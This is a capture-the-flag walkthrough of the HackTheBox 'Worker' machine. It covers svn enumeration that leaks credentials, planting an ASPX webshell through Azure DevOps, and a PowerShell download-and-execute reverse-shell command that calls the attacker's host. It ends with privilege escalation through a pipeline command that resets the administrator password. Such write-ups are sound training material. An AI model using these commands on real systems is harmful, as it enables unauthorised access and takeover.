Worker HackTheBox WalkThrough
This is Worker HackTheBox Walkthrough. In this writeup, I have demonstrated step-by-step how I rooted to Worker HTB box. Before starting let us know something about this box. It is a
windows box with IP address
10.10.10.203 and difficulty
medium assigned by it’s maker.
Before starting, first connect your PC with VPN and make sure your connectivity by pinging the IP 10.10.10.203. If all goes correct then it is time to start hacking.
As usual, I started by scanning the box. Scanning give us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it helps in vulnerability scanning also.
Nmap (port scanner) gave the following result:-
$nmap -sC -sV -T4 -oN worker_scan 10.10.10.203
Nmap discovered that port 80 and 3690 are open. Microsoft
IIS web server is running over port 80 and
svnserve service is running over port 3690. Ongoing to URL http://10.10.10.203/ found default web page of Microsoft IIS server. Tried to explore the
source-page if, this website has any
hyperlink of other pages. However, got nothing interesting except Microsoft official page link. So left it there and tried to move forward to enumerate on port 3690.
Didn’t know anything about svnserve service but after some googling found this interesting article. It explains about a tool
svn that is used to remotely access
svn server. After playing for sometimes with this tool got a subdomain
dimension.worker.htb and a file
$svn list --verbose -r 2 svn://10.10.10.203/
After some, more enumeration got a way to dump the content of the file
$svn diff -r 2 svn://10.10.10.203/
Got some credential
nathen : wendel98 and a new subdomain
devops.worker.htb. Did not know whose credential is it but as usual added it to my notes. It may be helpful further. Now we have two subdomains
devops.worker.htb. Added both these subdomains to my hosts file.
Modified Hosts File
Ongoing to http://dimension.worker.htb/#work got some more subdomains, which is
lens.worker.htb. Added them all to my hosts file. So my final hosts file looks something like below.
Modified Hosts File
Ongoing to subdomains alpha.worker.htb, cartoon.worker.htb, solid-state.worker.htb, spectral.worker.htb, story.worker.htb and lens.worker.htb got nothing interesting on all these pages. So left them there and ongoing to http://devops.worker.htb got a
login page like, we have in tomcat web server. Tried to login with the credential
nathen:wendel98 and successfully logged in.
Upon login, find that it is
Microsoft Azure DevOps platform. For more information about Microsoft Azure, you can watch this video. This is a Cloud based Service which gives us facility to create and deploy our custom package by directly uploading them on the server.
We will take advantage of it’s this feature of uploading and deploying any package. We will upload our command shell and deploy them in a branch created by us.
Therefore, to get a shell on my PC I followed the given steps.
1. Created a
cmdasp.aspx command shell in
spectral folder inside the branch
The command shell can be found at directory
/usr/share/webshells/aspx/ in Kali Linux.
3. Then performed
Pull and finally
Approved it respectively.
Once our package is approved, it can be accessed at http://spectral.worker.htb/aspcmd.aspx .
Since we will
command shell in
spectral directory that is why it will be accessed at subdomain
spectral.worker.htb. Had we used some other folder like
lens to upload our shell then it would be accessed at the subdomain
I exactly did the same steps as described above.
Uploading & Deploying Package
1. Login to the
DevOps using the credential
nathen : wendel98
2. Click on
3. On the left pan of the window click on
Braches option under
repos menu and click on the
New Branch to create a new branch.
4. Providing the Name as
MyBranch1 and then
5. Once branch is created click it to open all the files inside the branch.
6. Upload the
cmdasp.aspx command shell by choosing
Upload files and click on
commit button to commit the upload.
7. Once we have commited successfully click
Create a pull request to pull the commit.
8. Enter the name of the Title to
Anything and choose the Reviewers to
Nathalie Henley. In addition, choose Work Items to any from the two, which you want and click on
9. Click on
Complete and then
Complete Merge. Before clicking on
Complete Merge make sure to
uncheck the 2nd option
Delete MyBranch1 after merging.
Complete Merge you will get the following message.
Now all set. Just go to the URL http://spectral.worker.htb/cmdasp.aspx to access the command shell and confirm the host by executing
whoami && ipconfig.
Now we have remote command execution. It is time to get a reverse shell on our Terminal. There are multiple ways to get shell. I have used
Invoke-PowerShellTcp.ps1 from here.
Getting Shell through RCE
To get a shell I did the following things
1. Downloaded the shell from above URL
2. Changed the IP address and port number inside Invoke-PowerShellTcp.ps1 file to my tun0 IP
3. Started netcat listener locally
4. Started Python HTTP web server locally
5. And executed the following command in the command shell at http://spectral.worker.htb/cmdasp.aspx
$powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12/Invoke-PowerShellTcp.ps1')"
Note: Try to refresh the page http://spectral.worker.htb/cmdasp.aspx for 4 to 5 times if you don’t get a command shell because it may takes some times to be deployed.
We got a shell. After some initial enumeration found a drive
W on worker machine and inside the directory
W:\svnrepos\www\conf\ a file named
passwd. It contains all the
svn user credential. And also the credential of the user
robisl which is present in the
C:\Users\ directory. The credential is
Tried to login remotely with the credential
evil-winrm (A windows remote Management tool). And, successfully logged in.
Login using Evil-Winrm
$evil-winrm -i 10.10.10.203 -u robisl -p wolves11
Capture User Flag
To escalate privilege I did the following things
1. Logged in to
devops.worker.htb using the creads
robisl : wolves11
2. Created a
3. Then choosed “
Azure Repos Git” for importing code
4. Clicked Repository
PrtsUnlimited, then chose
starter pipeline as platform
5. Finally introduced
custom command inside the script to change admin password and at last
save & run the script to execute command.
Following above steps
Creating Pipeline & Running Script
1. Click on
2. On, the left pane click on the option
Azure Repos Git
5. Click on
6. Select the platform to
7. Edit the code by adding
net user administrator [email protected]. Click
save and run. The cmd command which we have introduced into our
azure-pipelines.yml file will change the
administrator password to
8. Type the name to
MyPipeline in review dialog box. Then
save and run.
After successful run, you will have the following window.
Our administrator password is changed. We can now login remotely to the worker machine using evil-winrm with the credential
administrator: [email protected]
$ evil-winrm -i 10.10.10.203 -u administrator -p [email protected]
Capture Root Flag
This is how I rooted to Worker HackTheBox. Learnt a lot after hunting this box. Hope you guys have also learnt some new things from this box. Thanks for reading this writeup. For any suggestion and query related to walkthrough, feel free to contact us at [email protected].
For more hackthebox walkthrough always visit ethicalhacs.com.